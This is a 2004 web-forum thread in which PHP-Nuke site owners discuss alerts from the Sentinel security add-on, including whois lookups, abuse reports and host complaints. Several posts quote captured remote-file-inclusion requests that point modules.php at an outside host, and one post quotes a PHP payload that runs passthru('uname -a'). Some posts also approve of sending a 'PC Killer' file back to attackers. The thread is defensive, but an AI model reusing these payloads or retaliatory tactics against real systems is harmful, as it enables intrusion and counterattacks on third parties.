| Author |
Message |
Himmel
Regular
Joined: May 08, 2004
Posts: 77
|
 Posted:
Thu Jun 24, 2004 11:57 pm |
 
|
Did install Sentinel yesterday on my gameclanwebpage. Getting this 1 this morning. Is this a hackattempt? The string looks normal and im not getting blocked clicking that module..
| Quote: | Date & Time: 2004-06-25 06:37:12
Blocked IP: 209.237.238.177
User ID: Anonymous (1)
Reason: Abuse - AGENT
--------------------
User Agent: ia_archiver
Query String:
Forwarded For: none
Client IP: none
Remote Address: 209.237.238.177
Remote Port: 53022
Request Method: GET
--------------------
Who-Is for IP
OrgName: United Layer, Inc.
OrgID: LAER
Address: 1019 Mission Street
City: San Francisco
StateProv: CA
PostalCode: 94103
Country: US
NetRange: 209.237.224.0 - 209.237.255.255
CIDR: 209.237.224.0/19
NetName: UNITEDLAYER-1
NetHandle: NET-209-237-224-0-1
Parent: NET-209-0-0-0-0
NetType: Direct Allocation
NameServer: NS1.UNITEDLAYER.COM
NameServer: NS2.UNITEDLAYER.COM
Comment: ADDRESSES WITHIN THIS BLOCK ARE NON-PORTABLE
RegDate: 2002-03-27
Updated: 2003-03-01
TechHandle: IU15-ARIN
TechName: UnitedLayer, Inc.
TechPhone: +1-415-865-0285
TechEmail:
OrgAbuseHandle: ABUSE175-ARIN
OrgAbuseName: Abuse Desk
OrgAbusePhone: +1-415-865-0285
OrgAbuseEmail:
OrgNOCHandle: IU15-ARIN
OrgNOCName: UnitedLayer, Inc.
OrgNOCPhone: +1-415-865-0285
OrgNOCEmail:
OrgTechHandle: IU15-ARIN
OrgTechName: UnitedLayer, Inc.
OrgTechPhone: +1-415-865-0285
OrgTechEmail: |
|
|
|
|
|
GanjaUK
Life Cycles Becoming CPU Cycles
Joined: Feb 14, 2004
Posts: 633
Location: England
|
| Posted:
Fri Jun 25, 2004 12:04 am |
|
Alexa spider that be.
ia_archiver is in the Sentinel Harvest List. You can remove it via Sentinel admin if you wish. |
|
|
|
|
Himmel
Regular
Joined: May 08, 2004
Posts: 77
|
| Posted:
Fri Jun 25, 2004 1:19 am |
|
Ok thx.. 
a few questions...
1. Are those bots like google? Are the 1's in the Harvest List harmfull?
2. How do you know that this is Alexa Spider? (im asking this so i can find out myself the nextime, dont want to post all my alerts  ) |
|
|
|
|
|
squiresmk
Regular
Joined: May 31, 2004
Posts: 95
Location: NY
|
| Posted:
Fri Jun 25, 2004 9:09 am |
|
If you took the time to read the email you received regarding the ban, you would have answered some of your own questions. 
Just like Google uses 'GoogleBot' to spider sites, Alexa has been using it's own named bot. Word of mouth and probably their spider info on their site let us know that this ia_archiver 'agent' is Alexa's bot. |
|
|
 
  |
|
squiresmk
Regular
Joined: May 31, 2004
Posts: 95
Location: NY
|
| Posted:
Fri Jun 25, 2004 9:10 am |
|
Perhaps someone should write explanations about each block type, so that you guys don't get continual posts regarding the same thing over and over? |
|
|
|
|
|
GanjaUK
Life Cycles Becoming CPU Cycles
Joined: Feb 14, 2004
Posts: 633
Location: England
|
| Posted:
Fri Jun 25, 2004 9:41 am |
|
| Himmel wrote: | Ok thx..
a few questions...
1. Are those bots like google? Are the 1's in the Harvest List harmfull?
2. How do you know that this is Alexa Spider? (im asking this so i can find out myself the nextime, dont want to post all my alerts ) |
Actually, I just ran "ia_archiver" on good old Google.
You will find out what this spider is, and what it does, I believe it stores copies of websites. |
|
|
|
|
|
Himmel
Regular
Joined: May 08, 2004
Posts: 77
|
| Posted:
Fri Jun 25, 2004 12:55 pm |
|
Ok..thx..will check for myself..
Same as this1 i guess i received just a few minutes ago..
| Quote: | Date & Time: 2004-06-25 06:31:17
Blocked IP: 217.160.129.159
User ID: Anonymous (1)
Reason: Abuse - OTHER
--------------------
User Agent: curl/7.7.1 (i686-suse-linux) libcurl 7.7.1 (SSL 0.9.6) (ipv6 enabled)
Query String:
Forwarded For: none
Client IP: none
Remote Address: 217.160.129.159
Remote Port: 50502
Request Method: GET
--------------------
Who-Is for IP
217.160.129.159
OrgName: RIPE Network Coordination Centre
OrgID: RIPE
Address: Singel 258
Address: 1016 AB
City: Amsterdam
StateProv:
PostalCode:
Country: NL
ReferralServer:
NetRange: 217.0.0.0 - 217.255.255.255
CIDR: 217.0.0.0/8
NetName: 217-RIPE
NetHandle: NET-217-0-0-0-1
Parent:
NetType: Allocated to RIPE NCC
NameServer: NS-PRI.RIPE.NET
NameServer: NS3.NIC.FR
NameServer: SUNIC.SUNET.SE
NameServer: AUTH00.NS.UU.NET
NameServer: SEC1.APNIC.NET
NameServer: SEC3.APNIC.NET
NameServer: TINNIE.ARIN.NET
Comment: These addresses have been further assigned to users in
Comment: the RIPE NCC region. Contact information can be found in
Comment: the RIPE database at
RegDate: 2000-06-05
Updated: 2004-03-16 |
|
|
|
|
|
|
squiresmk
Regular
Joined: May 31, 2004
Posts: 95
Location: NY
|
| Posted:
Fri Jun 25, 2004 1:06 pm |
|
Can you please at least LOOK at the email in its entirety before asking what is what? I mean, how hard is it to read the 'reason' for the banning? OTHER seems a bit different than AGENT, or are the words too similar to distinguish them apart?
There are other threads in this forum that mention this similar hack. Please take the time to read them. |
|
|
|
|
|
sixonetonoffun
Spouse Contemplates Divorce
Joined: Jan 02, 2003
Posts: 2499
|
| Posted:
Fri Jun 25, 2004 5:14 pm |
|
Dr. Himmel the second one
User Agent: curl/7.7.1 (i686-suse-linux) libcurl 7.7.1 (SSL 0.9.6) (ipv6 enabled)
Query String:
Is a remote attack that attempts to create an admin account here is what you will find at that address.
217.59.104.226
<? echo "\nbl3" . 'bl3 ' ; passthru("uname -a") ; ?>
Which are encoded variables to make it slightly harder for us to figure out exactly what they are doing in thier script. Fortunetly we got a copy of this one a couple weeks ago for disection.
The reason it was captured is the name=http:// had it not been for this it may have gotten forther along then it did.
Peter |
|
|
|
|
|
Himmel
Regular
Joined: May 08, 2004
Posts: 77
|
| Posted:
Fri Jun 25, 2004 5:50 pm |
|
Thx sixonetonoffun.. for your kind answer ..
Burnwave..take an icewave and cooldown  |
|
|
|
|
|
squiresmk
Regular
Joined: May 31, 2004
Posts: 95
Location: NY
|
| Posted:
Fri Jun 25, 2004 8:34 pm |
|
|
|
|
|
redville
New Member
Joined: Jan 22, 2004
Posts: 9
|
| Posted:
Sat Jun 26, 2004 10:25 pm |
|
Yes, this guy sure is busy and still active!
Date & Time: 2004-06-26 20:33:07
Blocked IP: 217.160.129.159
User ID: Anonymous (1)
Reason: Abuse - OTHER
--------------------
User Agent: curl/7.7.1 (i686-suse-linux) libcurl 7.7.1 (SSL 0.9.6) (ipv6 enabled)
Query String:
Forwarded For: none
Client IP: none
Remote Address: 217.160.129.159
Remote Port: 36871
Request Method: GET
--------------------
Who-Is for IP
217.160.129.159
OrgName: RIPE Network Coordination Centre
OrgID: RIPE
Address: Singel 258
Address: 1016 AB
City: Amsterdam
StateProv:
PostalCode:
Country: NL
ReferralServer:
NetRange: 217.0.0.0 - 217.255.255.255
CIDR: 217.0.0.0/8
NetName: 217-RIPE
NetHandle: NET-217-0-0-0-1
Parent:
NetType: Allocated to RIPE NCC
NameServer: NS-PRI.RIPE.NET
NameServer: NS3.NIC.FR
NameServer: SUNIC.SUNET.SE
NameServer: AUTH00.NS.UU.NET
NameServer: SEC1.APNIC.NET
NameServer: SEC3.APNIC.NET
NameServer: TINNIE.ARIN.NET
Comment: These addresses have been further assigned to users in
Comment: the RIPE NCC region. Contact information can be found in
Comment: the RIPE database at
RegDate: 2000-06-05
Updated: 2004-03-16 |
|
|
|
|
|
redville
New Member
Joined: Jan 22, 2004
Posts: 9
|
| Posted:
Sat Jun 26, 2004 10:56 pm |
|
The Ripe.net database came up with this information on the IP address
inetnum: 217.160.128.0 - 217.160.143.255
netname: SCHLUND-CUSTOMERS
descr: Schlund + Partner AG
descr: NCC#1999110113
country: DE
admin-c: UI-RIPE
tech-c: UI-RIPE
remarks: INFRA-AW
remarks: in case of abuse or spam, please mailto:
rev-srv: nsa.schlund.de
rev-srv: ns.schlund.de
rev-srv: ns2.schlund.de
status: ASSIGNED PA
mnt-by: SCHLUND-MNT
changed: 20040611
source: RIPE
route: 217.160.0.0/16
descr: SCHLUND-PA-3
origin: AS8560
notify:
mnt-by: SCHLUND-MNT
changed: 20040611
source: RIPE
role: Schlund NCC
address: Schlund + Partner AG
address: Brauerstrasse 48
address: D-76135 Karlsruhe
address: Germany
remarks: For abuse issues, please use only
remarks: For NOC issues, please look at our AS 8560
phone: +49 721 91374 50
fax-no: +49 721 91374 20
e-mail:
admin-c: SPNC-RIPE
tech-c: SPNC-RIPE
nic-hdl: UI-RIPE
notify:
mnt-by: SCHLUND-MNT
changed: 20040512
source: RIPE
I just wrote them asking for their help in closing this down. |
|
|
|
|
|
dean
Worker
Joined: Apr 14, 2004
Posts: 193
|
| Posted:
Sat Jun 26, 2004 11:16 pm |
|
I sent an email to host and received this back:
| Quote: | Thank you for contacting our abuse department.
Sending spam mails or any other abusive use of our systems against other
internet users or systems is strictly prohibited by our acceptable use
policy.
We will take appropriate actions against customers breaking these rules if
you send us the complete mail (including all header lines) in case of email
abuse or date/time and connection data like IP addresses and ports together
with a description of the abusive actions that were performed in case of
port scanning activities or similar.
This may be the last reply that you receive regarding your complaint. Please
do not, however, interpret a lack of response as a lack of action taken.
Please be assured that if we find that a customer is in violation of our
policies, that we will take the necessary action to stop the activity in
question.
On the other hand, sometimes it may be necessary that we contact you again
in order to receive more detailed information about the circumstances under
which the abusive actions that you are concerned about have taken place.
Yours sincerely,
Schlund+Partner Abuse Team |
|
|
|
|
|
|
Himmel
Regular
Joined: May 08, 2004
Posts: 77
|
| Posted:
Sun Jun 27, 2004 5:05 am |
|
Looks like a standard email..No action taken i guess.....
Got this1 myself. But i think thats not easy to do something about this.. Contacting my webhost: "They normaly use fake-ip's, we cant do anything" They cant/wont do anything about this 
Query String:
Came up with this via ripe.net:
| Quote: | inetnum: 217.59.104.224 - 217.59.104.231
netname: MARIND
descr: MARIND
country: IT
admin-c: GG10175-RIPE
tech-c: GG10175-RIPE
status: ASSIGNED PA
notify:
mnt-by: INTERB-MNT
changed: 20010327
source: RIPE
route: 217.56.0.0/14
descr: INTERBUSINESS
origin: AS3269
remarks: Send report of network abuse/spam
remarks: only to: .
remarks: If you report abuse to any other address
remarks: you will get no response.
notify:
mnt-by: INTERB-MNT
changed: 20011009
source: RIPE
person: Giuseppe Ghiani
address: MARIND
address: v.le monastir km. 6.450
address: I- 09032 assemini ca
address: Italy
phone: +39 070941227
fax-no: +39 070946919
nic-hdl: GG10175-RIPE
changed: 20010327
source: RIPE |
|
|
|
|
|
|
Brujo
Regular
Joined: Jun 04, 2004
Posts: 84
Location: Germany
|
| Posted:
Sun Jun 27, 2004 12:13 pm |
|
i got also this Attack banned by sentinel the last days and was glad, that it works
but i also checked my Logfile and saw a lot of different Attacks from this kind, who was not recogniced by sentinel. I am not sure if sentinel must catch them or not, so i post some examples for you guys to verify.
| Quote: | "GET /modules.php?name=http%3A//217.59.104.226/&file=http%3A//217.59.104.226/&sid=http%3A//217.59.104.226/ HTTP/1.0" 200 9904 "-" "Wget/1.6"
"GET /modules.php?name=http%3A//217.59.104.226/&pa=http%3A//217.59.104.226/&pid=http%3A//217.59.104.226/ HTTP/1.0" 200 9860 "-" "Wget/1.6"
"GET /modules.php?name=http://217.59.104.226/&l_op=http://217.59.104.226/&cid=http://217.59.104.226/ HTTP/1.1" 200 2672 "-" "curl/7.7.1 (i686-suse-linux) libcurl 7.7.1 (SSL 0.9.6) (ipv6 enabled)"
|
with best regards
Brujo |
|
|
|
|
|
dean
Worker
Joined: Apr 14, 2004
Posts: 193
|
| Posted:
Sun Jun 27, 2004 4:00 pm |
|
Two of my sites hacked today and only resolve if at all after many minutes. PhpMyAdmin also shows difficulty resolving as well and takes considerable time to get from page to page. I have contacted my host to request help restoring site and PhpMyAdmin. Heres the report from Sentinel:
| Quote: | My phpnuke sites at were hacked today and phpMy Admin was compromised. As a result, none of the nuke installations will resolve. Please help restoring my domain after it was maliciously attacked. Here is the technical information I obtained regarding the hackers:
1st attack:
Date & Time: 2004-06-27 09:09:31
Blocked IP: 81.74.252.73
User ID: Anonymous (1)
Reason: Abuse - OTHER
--------------------
User Agent: curl/7.9.5 (i586-pc-linux-gnu) libcurl 7.9.5 (ipv6 enabled)
Query String: alaskandog.com/designs/modules.php?name=http://217.59.104.226/&file=http://217.59.104.226/&album=http://217.59.104.226/
Forwarded For: none
Client IP: none
Remote Address: 81.74.252.73
Remote Port: 54900
Request Method: GET
--------------------
Who-Is for IP
81.74.252.73
OrgName: RIPE Network Coordination Centre
OrgID: RIPE
Address: Singel 258
Address: 1016 AB
City: Amsterdam
StateProv:
PostalCode:
Country: NL
ReferralServer:
NetRange: 81.0.0.0 - 81.255.255.255
CIDR: 81.0.0.0/8
NetName: 81-RIPE
NetHandle: NET-81-0-0-0-1
Parent:
NetType: Allocated to RIPE NCC
NameServer: NS-PRI.RIPE.NET
NameServer: NS3.NIC.FR
NameServer: SUNIC.SUNET.SE
NameServer: AUTH62.NS.UU.NET
NameServer: SEC1.APNIC.NET
NameServer: SEC3.APNIC.NET
NameServer: TINNIE.ARIN.NET
Comment: These addresses have been further assigned to users in
Comment: the RIPE NCC region. Contact information can be found in
Comment: the RIPE database at
RegDate:
Updated: 2004-03-16
2nd Attack:
Date & Time: 2004-06-27 09:22:17
Blocked IP: 81.74.252.73
User ID: Anonymous (1)
Reason: Abuse - OTHER
--------------------
User Agent: curl/7.9.5 (i586-pc-linux-gnu) libcurl 7.9.5 (ipv6 enabled)
Query String: alaskandog.com/ipw-web/portal/cms/modules.php?name=http://217.59.104.226/&file=http://217.59.104.226/&album=http://217.59.104.226/
Forwarded For: none
Client IP: none
Remote Address: 81.74.252.73
Remote Port: 41594
Request Method: GET
--------------------
Who-Is for IP
81.74.252.73
OrgName: RIPE Network Coordination Centre
OrgID: RIPE
Address: Singel 258
Address: 1016 AB
City: Amsterdam
StateProv:
PostalCode:
Country: NL
ReferralServer:
NetRange: 81.0.0.0 - 81.255.255.255
CIDR: 81.0.0.0/8
NetName: 81-RIPE
NetHandle: NET-81-0-0-0-1
Parent:
NetType: Allocated to RIPE NCC
NameServer: NS-PRI.RIPE.NET
NameServer: NS3.NIC.FR
NameServer: SUNIC.SUNET.SE
NameServer: AUTH62.NS.UU.NET
NameServer: SEC1.APNIC.NET
NameServer: SEC3.APNIC.NET
NameServer: TINNIE.ARIN.NET
Comment: These addresses have been further assigned to users in
Comment: the RIPE NCC region. Contact information can be found in
Comment: the RIPE database at
RegDate:
Updated: 2004-03-16
|
|
|
|
|
|
|
Raven
Site Admin/Owner
Joined: Aug 27, 2002
Posts: 16987
Location: Kansas
|
| Posted:
Sun Jun 27, 2004 6:46 pm |
|
Not sure I'm understanding entirely. If Sentinel blocked it, which it should have unless you only had it set for email, then how was it hacked? |
|
|
|
|
|
dean
Worker
Joined: Apr 14, 2004
Posts: 193
|
| Posted:
Sun Jun 27, 2004 7:36 pm |
|
I'm not sure - just received a reply from host (I Power Web) and they said they were experiencing problems with the database server which interestingly coincided with the query string from the hacker and problems with mysites. I'm still corresponding with them about the source of the server problem and will keep you updated. |
|
|
|
|
|
BobMarion
Former Admin in Good Standing
Joined: Oct 30, 2002
Posts: 1043
Location: RedNeck Land (known as Kentucky)
|
| Posted:
Sun Jun 27, 2004 10:35 pm |
|
I Power Web, you need to get a new host |
|
|
|
|
dean
Worker
Joined: Apr 14, 2004
Posts: 193
|
| Posted:
Sun Jun 27, 2004 11:26 pm |
|
I bought a year with them thats up in a couple of months - are you suggesting that theres better options? |
|
|
|
|
|
newbie
Regular
Joined: May 03, 2004
Posts: 62
Location: USA
|
| Posted:
Sun Jun 27, 2004 11:55 pm |
|
| sixonetonoffun wrote: | Dr. Himmel the second one
User Agent: curl/7.7.1 (i686-suse-linux) libcurl 7.7.1 (SSL 0.9.6) (ipv6 enabled)
Query String:
Is a remote attack that attempts to create an admin account here is what you will find at that address.
217.59.104.226
<? echo "\nbl3" . 'bl3 ' ; passthru("uname -a") ; ?>
Which are encoded variables to make it slightly harder for us to figure out exactly what they are doing in thier script. Fortunetly we got a copy of this one a couple weeks ago for disection.
The reason it was captured is the name=http:// had it not been for this it may have gotten forther along then it did.
Peter |
Hi Peter,
Just wanted to say "Hi" and what a pleasure it is to read you.
You're always polite, friendly and helpful.
Take care. |
|
|
|
|
|
BobMarion
Former Admin in Good Standing
Joined: Oct 30, 2002
Posts: 1043
Location: RedNeck Land (known as Kentucky)
|
| Posted:
Mon Jun 28, 2004 12:34 am |
|
Compare ravenwebhosting.com or/and getwhp.com . In my experience I Power Web is a problem waiting to happen. Here again this is my personal experience with them, you may have had better service. |
|
|
|
|
|
redville
New Member
Joined: Jan 22, 2004
Posts: 9
|
| Posted:
Mon Jun 28, 2004 6:55 am |
|
Doesn't look like whoever is using that script is going to give up anytime soon.
He again hit both of my websites overnight, of course Sentinel stopped him again, trying from the 81.74.252.73 IP Address even after he failed from the 217.59.104.226 IP Address. I had gone in and changed the .htaccess to block all the 217 addresses.
I sent a e-mail to and it came back as undeliverable, seems their mailbox is over quota. Everyone must be reporting the abuse.
I was just wondering though is there anyway to tell whether he received the PC Killer file, since I have Sentinel preferences set up to send it.
Thanks |
|
|
|
|
|
Raven
Site Admin/Owner
Joined: Aug 27, 2002
Posts: 16987
Location: Kansas
|
| Posted:
Mon Jun 28, 2004 6:58 am |
|
He received it unless he was running these attacks through a batch file (non display mode). Now, he may have a pop-up blocker installed that caught it, but is usually even evades those. |
Last edited by Raven on Mon Jun 28, 2004 12:47 pm; edited 1 time in total |
|
|
|
|
|
|
|
|
![[Valid RSS]](http://www.ravenphpscripts.com/images/valid-rss.png "Validate my RSS feed"){kind=small}
:: 
::
